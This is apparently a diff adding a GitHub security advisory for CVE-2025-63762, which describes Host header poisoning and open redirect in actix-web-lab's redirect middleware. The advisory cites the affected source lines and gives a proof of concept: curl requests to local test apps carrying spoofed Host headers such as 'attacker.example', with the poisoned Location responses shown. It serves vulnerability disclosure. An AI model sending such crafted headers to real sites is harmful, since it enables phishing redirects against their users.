+ "details": "### Summary\n`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.\n\n### CVE\nAssigned CVE ID: CVE-2025-63762\n\n### Details\nThe issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:\n\n1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)\n - `let host = conn_info.host();`\n - `format!(\"https://{hostname}{path}\")`\n - `format!(\"https://{hostname}:{port}{path}\")`\n\n2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)\n - `format!(\"{scheme}://www.{host}{path}\")`\n\n3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)\n - `format!(\"{scheme}://{host_no_www}{path}\")`\n\nBecause host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.\n\n### PoC\nEnvironment used for validation:\n- Local minimal Actix apps using `actix-web-lab` middleware\n- RedirectHttps: `http://127.0.0.1:18080`\n- redirect_to_www: `http://127.0.0.1:18081`\n- redirect_to_non_www: `http://127.0.0.1:18082`\n\nReproduction (RedirectHttps):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/test\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://attacker.example/test\n```\n\nAdditional verification:\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/abc/def\" -H \"Host: evil.example:9999\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://evil.example/abc/def\n```\n\nReproduction (redirect_to_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18081/hello\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://www.attacker.example/hello\n```\n\nReproduction (redirect_to_non_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18082/path\" -H \"Host: www.attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://attacker.example/path\n```\n\n### Impact\nThis is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments